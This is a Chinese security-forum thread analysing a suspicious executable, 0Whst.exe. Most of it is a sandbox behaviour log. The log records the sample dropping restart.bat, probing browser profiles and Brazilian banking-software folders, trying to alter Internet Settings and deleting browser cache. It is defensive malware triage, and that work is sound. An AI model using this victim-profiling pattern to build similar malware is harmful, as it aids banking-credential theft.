12
返回列表 发新帖
楼主: 墨家小子
收起左侧

[可疑文件] File name: 0Whst.exe Detection ratio: 7 / 61 谁测一下是不是注入reg.exe

[复制链接]
qftest
发表于 2017-7-13 11:14:39 | 显示全部楼层
Dolby123 发表于 2017-7-13 10:52
是那个restart.bat 搞reg的吧 ,被EMSI干掉了

process monitor?
Dolby123
发表于 2017-7-13 11:16:19 | 显示全部楼层

是的, 懒惰上传hybrid了 直接用老方法
qftest
发表于 2017-7-13 11:17:13 | 显示全部楼层
Dolby123 发表于 2017-7-13 11:16
是的, 懒惰上传hybrid了  直接用老方法

明白了
学雷锋做人
发表于 2017-7-13 11:20:11 | 显示全部楼层
本帖最后由 学雷锋做人 于 2017-7-13 11:22 编辑

从头到尾全跑了出来

[mw_shl_code=css,true]11:15:17[1]:(允许)程序启动:File_Analysis 行为记录成功开启   规则版本:1.2.0.0

11:15:19[2]:(允许)获取文件属性:C:\Users\wang\AppData\Roaming

11:15:19[3]:(允许)获取文件属性:C:\Users\wang\Desktop\File_safe\0Whst.zh-CN

11:15:19[4]:(安全环境)查找文件:C:\Users\wang\Desktop\File_safe\0Whst.zh-CN

11:15:19[5]:(允许)获取文件属性:C:\Users\wang\Desktop\File_safe\0Whst.zh-Hans

11:15:19[6]:(安全环境)查找文件:C:\Users\wang\Desktop\File_safe\0Whst.zh-Hans

11:15:19[7]:(允许)获取文件属性:C:\Users\wang\Desktop\File_safe\0Whst.zh

11:15:19[8]:(安全环境)查找文件:C:\Users\wang\Desktop\File_safe\0Whst.zh

11:15:19[9]:(允许)获取文件属性:C:\Users\wang\Desktop\File_safe\0Whst.en-US

11:15:19[10]:(安全环境)查找文件:C:\Users\wang\Desktop\File_safe\0Whst.en-US

11:15:19[11]:(允许)获取文件属性:C:\Users\wang\Desktop\File_safe\0Whst.en

11:15:19[12]:(安全环境)查找文件:C:\Users\wang\Desktop\File_safe\0Whst.en

11:15:19[13]:(允许)获取文件属性:C:\Users\wang\Desktop\File_safe\0Whst.CHS

11:15:19[14]:(安全环境)查找文件:C:\Users\wang\Desktop\File_safe\0Whst.CHS

11:15:19[15]:(允许)获取文件属性:C:\Users\wang\Desktop\File_safe\0Whst.CH

11:15:19[16]:(安全环境)查找文件:C:\Users\wang\Desktop\File_safe\0Whst.CH

11:15:20[17]:(允许)创建注册表键:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion

11:15:20[18]:(允许)获取文件属性:C:\Users\wang\AppData\Roaming\mp6.txt

11:15:20[19]:(允许)写入文件:C:\Users\wang\AppData\Roaming\mp6.txt

11:15:20[20]:(允许)创建注册表键:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\

11:15:20[21]:(允许)创建注册表键:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\

11:15:20[22]:(允许)创建注册表键:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\

11:15:20[23]:(允许)获取文件属性:regrestart.txt

11:15:20[24]:(允许)写入文件:restart.bat

11:15:20[25]:(允许)写入文件:regrestart.txt

11:15:20[26]:(允许)写入文件:C:\Users\wang\AppData\Local\Temp\regrestart.txt

11:15:20[27]:(阻止)运行外部程序地址:restart.bat

11:15:20[28]:(允许)读取文件:C:\Windows\Fonts\staticcache.dat     访问权限:-2147483648

11:15:20[29]:(允许)获取进程快照:系统全部进程

11:15:20[30]:(允许)获取进程快照:系统全部进程

11:15:20[31]:(允许)获取进程快照:系统全部进程

11:15:20[32]:(允许)获取进程快照:系统全部进程

11:15:20[33]:(允许)获取进程快照:系统全部进程

11:15:20[34]:(允许)获取进程快照:系统全部进程

11:15:20[35]:(允许)获取进程快照:系统全部进程

11:15:20[36]:(允许)获取进程快照:系统全部进程

11:15:20[37]:(允许)获取进程快照:系统全部进程

11:15:20[38]:(允许)获取进程快照:系统全部进程

11:15:20[39]:(允许)获取进程快照:系统全部进程

11:15:20[40]:(允许)获取文件属性:C:\Users\wang\AppData\Local

11:15:20[41]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Google\Chrome\User Data\Local State

11:15:20[42]:(允许)获取进程快照:系统全部进程

11:15:20[43]:(允许)获取进程快照:系统全部进程

11:15:20[44]:(允许)获取进程快照:系统全部进程

11:15:20[45]:(允许)获取进程快照:系统全部进程

11:15:20[46]:(允许)获取进程快照:系统全部进程

11:15:20[47]:(允许)获取进程快照:系统全部进程

11:15:20[48]:(允许)获取进程快照:系统全部进程

11:15:20[49]:(允许)获取进程快照:系统全部进程

11:15:20[50]:(允许)获取进程快照:系统全部进程

11:15:20[51]:(允许)获取进程快照:系统全部进程

11:15:20[52]:(允许)获取进程快照:系统全部进程

11:15:20[53]:(允许)查找文件:C:\Users\wang\AppData\Roaming\Mozilla\prefs.js

11:15:20[54]:(允许)查找文件:C:\Users\wang\AppData\Roaming\Mozilla\*.*

11:15:20[55]:(允许)获取文件属性:C:\Users\wang\AppData\Roaming

11:15:20[56]:(允许)获取文件属性:C:\Users\wang\AppData\Roaming\mp6.txt

11:15:20[57]:(允许)写入文件:C:\Users\wang\AppData\Roaming\mp6.txt

11:15:20[58]:(允许)创建注册表键:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\

11:15:20[59]:(允许)创建注册表键:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\

11:15:20[60]:(允许)读取文件:C:\Windows\Registration\R00000000000c.clb     访问权限:-2147483648

11:15:20[61]:(允许)获取文件属性:C:\Windows\system32\wbem\Logs\

11:15:20[62]:(允许)读取文件:C:\Windows\system32\wbem\wbemdisp.TLB     访问权限:-2147483648

11:15:20[63]:(允许)读取文件:\\.\Nsi     访问权限:0

11:15:20[64]:(允许)读取文件:C:\Windows\system32\rsaenh.dll     访问权限:-2147483648

11:15:20[65]:(允许)读取文件:C:\Windows\system32\wbem\wbemdisp.TLB     访问权限:-2147483648

11:15:20[66]:(允许)获取文件属性:C:\Users\wang\AppData\Local\GAS Tecnologia\GBBD\abn

11:15:20[67]:(允许)获取文件属性:C:\ProgramData\GAS Tecnologia\Abn

11:15:20[68]:(允许)获取文件属性:C:\Users\wang\AppData\Local\GAS Tecnologia\GBBD\bb

11:15:20[69]:(允许)获取文件属性:C:\ProgramData\GAS Tecnologia\Bb

11:15:20[70]:(允许)获取文件属性:C:\Users\wang\AppData\Local\GAS Tecnologia\GBBD\cef

11:15:20[71]:(允许)获取文件属性:C:\ProgramData\GAS Tecnologia\Cef

11:15:20[72]:(允许)获取文件属性:C:\Users\wang\AppData\Local\GAS Tecnologia\GBBD\uni

11:15:20[73]:(允许)获取文件属性:C:\ProgramData\GAS Tecnologia\Uni

11:15:20[74]:(允许)获取文件属性:C:\Users\wang\AppData\Roaming\NetExpress50

11:15:20[75]:(允许)获取文件属性:C:\Program Files (x86)\AppBrad

11:15:20[76]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Aplicativo Itau

11:15:20[77]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Aplicativo Itau\itauaplicativo.exe

11:15:20[78]:(允许)获取文件属性:C:\Users\wang\AppData\LocalLow\Scpad

11:15:20[79]:(允许)获取文件属性:C:\Arquivos de programas\Scpad\scpsssh2.dll

11:15:20[80]:(允许)获取文件属性:C:\Program Files\Scpad\scpsssh2.dll

11:15:20[81]:(允许)获取文件属性:C:\ProgramData\Scpad

11:15:20[82]:(允许)获取文件属性:C:\Users\wang\AppData\Local\GAS Tecnologia\GBBD\scd

11:15:20[83]:(允许)获取文件属性:C:\ProgramData\GAS Tecnologia\Scd

11:15:20[84]:(允许)获取文件属性:C:\ProgramData\GAS Tecnologia\scd

11:15:20[85]:(允许)获取文件属性:C:\Users\wang\AppData\Roaming\INFE

11:15:20[86]:(允许)获取文件属性:C:\Users\wang\AppData\Roaming\INFE

11:15:20[87]:(允许)获取文件属性:C:\Users\wang\AppData\Roaming

11:15:20[88]:(允许)创建文件目录:C:\Users\wang\AppData\Roaming\INFE

11:15:20[89]:(允许)写入文件:C:\Users\wang\AppData\Roaming\date.dat

11:15:20[90]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[91]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[92]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[93]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[94]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[95]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[96]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[97]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[98]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[99]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[100]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[101]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[102]:(允许)创建文件目录:C:\Users\wang

11:15:20[103]:(允许)获取文件属性:C:\Users\wang

11:15:20[104]:(允许)创建文件目录:C:\Users\wang\AppData\Local

11:15:20[105]:(允许)获取文件属性:C:\Users\wang\AppData\Local

11:15:20[106]:(安全环境)创建文件目录:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files

11:15:20[107]:(允许)访问其他进程:2248(进程PID)     进程句柄:1172     获取权限:64

11:15:20[108]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files

11:15:20[109]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files

11:15:20[110]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini

11:15:20[111]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5

11:15:20[112]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5

11:15:20[113]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini

11:15:20[114]:(允许)创建文件目录:C:\Users\wang

11:15:20[115]:(允许)获取文件属性:C:\Users\wang

11:15:20[116]:(允许)创建文件目录:C:\Users\wang\AppData\Roaming

11:15:20[117]:(允许)获取文件属性:C:\Users\wang\AppData\Roaming

11:15:20[118]:(允许)创建文件目录:C:\Users\wang\AppData\Roaming\Microsoft\Windows\Cookies

11:15:20[119]:(允许)获取文件属性:C:\Users\wang\AppData\Roaming\Microsoft\Windows\Cookies

11:15:20[120]:(允许)获取文件属性:C:\Users\wang\AppData\Roaming\Microsoft\Windows\Cookies

11:15:20[121]:(允许)创建文件目录:C:\Users\wang

11:15:20[122]:(允许)获取文件属性:C:\Users\wang

11:15:20[123]:(允许)创建文件目录:C:\Users\wang\AppData\Local

11:15:20[124]:(允许)获取文件属性:C:\Users\wang\AppData\Local

11:15:20[125]:(安全环境)创建文件目录:C:\Users\wang\AppData\Local\Microsoft\Windows\History

11:15:20[126]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\History

11:15:20[127]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\History

11:15:20[128]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\History\desktop.ini

11:15:20[129]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\History\History.IE5

11:15:20[130]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\History\History.IE5

11:15:20[131]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini

11:15:20[132]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\

11:15:20[133]:(安全环境)设置文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\

11:15:20[134]:(安全环境)写入文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat     访问权限:-1073741824

11:15:20[135]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat

11:15:20[136]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\

11:15:20[137]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini

11:15:20[138]:(安全环境)创建文件目录:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FKVT6YSF

11:15:20[139]:(安全环境)设置文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FKVT6YSF

11:15:20[140]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FKVT6YSF

11:15:20[141]:(安全环境)创建文件目录:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2LYWRT2O

11:15:20[142]:(安全环境)设置文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2LYWRT2O

11:15:20[143]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2LYWRT2O

11:15:20[144]:(安全环境)创建文件目录:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1GHFIERX

11:15:20[145]:(安全环境)设置文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1GHFIERX

11:15:20[146]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\1GHFIERX

11:15:20[147]:(安全环境)创建文件目录:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\20K34KXX

11:15:20[148]:(安全环境)设置文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\20K34KXX

11:15:20[149]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\20K34KXX

11:15:20[150]:(允许)查找文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\*.*

11:15:20[151]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\*.*9C1K6332\desktop.ini

11:15:20[152]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DBDLK1W2\desktop.ini

11:15:20[153]:(安全环境)设置文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DBDLK1W2\desktop.ini

11:15:20[154]:(阻止)删除文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DBDLK1W2\desktop.ini

11:15:20[155]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DBDLK1W2\desktop.ini

11:15:20[156]:(安全环境)设置文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DBDLK1W2\desktop.ini

11:15:20[157]:(阻止)删除文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DBDLK1W2\desktop.ini

11:15:20[158]:(允许)查找文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DBDLK1W2\*.*

11:15:20[159]:(阻止)删除文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DBDLK1W2\all_async_search_1ae0913[1].js

11:15:20[160]:(阻止)删除文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DBDLK1W2\baidu_com[1].htm

11:15:20[161]:(阻止)删除文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DBDLK1W2\desktop.ini

11:15:20[162]:(阻止)删除文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DBDLK1W2\every_cookie_a70bc15[1].js

11:15:20[163]:(阻止)删除文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DBDLK1W2\his[1]

11:15:20[164]:(安全环境)设置文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DBDLK1W2

11:15:20[165]:(阻止)删除文件目录:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DBDLK1W2

11:15:20[166]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\V9I9Y7PP\desktop.ini

11:15:20[167]:(安全环境)设置文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\V9I9Y7PP\desktop.ini

11:15:20[168]:(阻止)删除文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\V9I9Y7PP\desktop.ini

11:15:20[169]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\V9I9Y7PP\desktop.ini

11:15:20[170]:(安全环境)设置文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\V9I9Y7PP\desktop.ini

11:15:20[171]:(阻止)删除文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\V9I9Y7PP\desktop.ini

11:15:20[172]:(允许)查找文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\V9I9Y7PP\*.*

11:15:20[173]:(阻止)删除文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\V9I9Y7PP\bd_logo1[1].png

11:15:20[174]:(阻止)删除文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\V9I9Y7PP\content-search[1].xml

11:15:20[175]:(阻止)删除文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\V9I9Y7PP\desktop.ini

11:15:20[176]:(阻止)删除文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\V9I9Y7PP\icons_5859e57[1].png

11:15:20[177]:(阻止)删除文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\V9I9Y7PP\nu_instant_search_7881c1c[1].js

11:15:20[178]:(安全环境)设置文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\V9I9Y7PP

11:15:20[179]:(阻止)删除文件目录:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\V9I9Y7PP

11:15:20[180]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WK6LWGIH\desktop.ini

11:15:20[181]:(安全环境)设置文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WK6LWGIH\desktop.ini

11:15:20[182]:(阻止)删除文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WK6LWGIH\desktop.ini

11:15:20[183]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WK6LWGIH\desktop.ini

11:15:20[184]:(安全环境)设置文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WK6LWGIH\desktop.ini

11:15:20[185]:(阻止)删除文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WK6LWGIH\desktop.ini

11:15:20[186]:(允许)查找文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WK6LWGIH\*.*

11:15:20[187]:(阻止)删除文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WK6LWGIH\baidu_com[1].htm

11:15:20[188]:(阻止)删除文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WK6LWGIH\baidu_jgylogo3[1].gif

11:15:20[189]:(阻止)删除文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WK6LWGIH\bdsug_async_97a395d[1].js

11:15:20[190]:(阻止)删除文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WK6LWGIH\desktop.ini

11:15:20[191]:(阻止)删除文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WK6LWGIH\quickdelete_33e3eb8[1].png

11:15:20[192]:(阻止)删除文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WK6LWGIH\sbietrayfull[1].png

11:15:20[193]:(安全环境)设置文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WK6LWGIH

11:15:20[194]:(阻止)删除文件目录:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WK6LWGIH

11:15:20[195]:(允许)获取文件属性:C:\Users\wang\AppData\Roaming\Microsoft\Windows\Cookies\

11:15:20[196]:(安全环境)设置文件属性:C:\Users\wang\AppData\Roaming\Microsoft\Windows\Cookies\

11:15:20[197]:(允许)写入文件:C:\Users\wang\AppData\Roaming\Microsoft\Windows\Cookies\index.dat

11:15:20[198]:(允许)获取文件属性:C:\Users\wang\AppData\Roaming\Microsoft\Windows\Cookies\index.dat

11:15:20[199]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\History\History.IE5\

11:15:20[200]:(安全环境)设置文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\History\History.IE5\

11:15:20[201]:(安全环境)写入文件:C:\Users\wang\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat     访问权限:-1073741824

11:15:20[202]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat

11:15:20[203]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\

11:15:20[204]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini

11:15:20[205]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\History\History.IE5\

11:15:20[206]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini

11:15:20[207]:(安全环境)写入文件:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat     访问权限:-1073741824

11:15:20[208]:(允许)获取文件属性:C:\Users\wang\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat

11:15:20[209]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[210]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[211]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[212]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[213]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[214]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[215]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[216]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[217]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[218]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[219]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[220]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[221]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[222]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[223]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[224]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[225]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[226]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[227]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[228]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[229]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[230]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[231]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[232]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[233]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[234]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[235]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[236]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[237]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[238]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[239]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[240]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[241]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[242]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[243]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[244]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[245]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[246]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[247]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[248]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[249]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[250]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

11:15:20[251]:(阻止)创建注册表键:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

